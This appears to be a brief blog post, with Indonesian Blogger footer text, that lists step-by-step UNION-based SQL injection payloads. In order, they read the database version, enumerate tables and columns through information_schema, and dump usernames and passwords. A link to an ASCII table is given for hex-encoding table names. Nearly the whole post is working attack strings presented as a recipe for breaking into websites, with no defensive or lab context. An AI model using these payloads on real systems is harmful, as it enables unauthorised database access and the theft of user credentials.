Step by Step SQL Injection

0.
cekk website token error alert...
1.
+union+all+select+1,version(),3,4,5,6,7--
2.
+union+all+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--
next..

continue....
3.
http://www.piclist.com/techref/ascii.htm
4.
+union+all+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0xasciiname table--
5.
+union+all+select+1,group_concat(username,0x3a,pass),3,4,5,6,7+from+colomnametable--

nice t0 nalar or basic :)

Tidak ada komentar:

Posting Komentar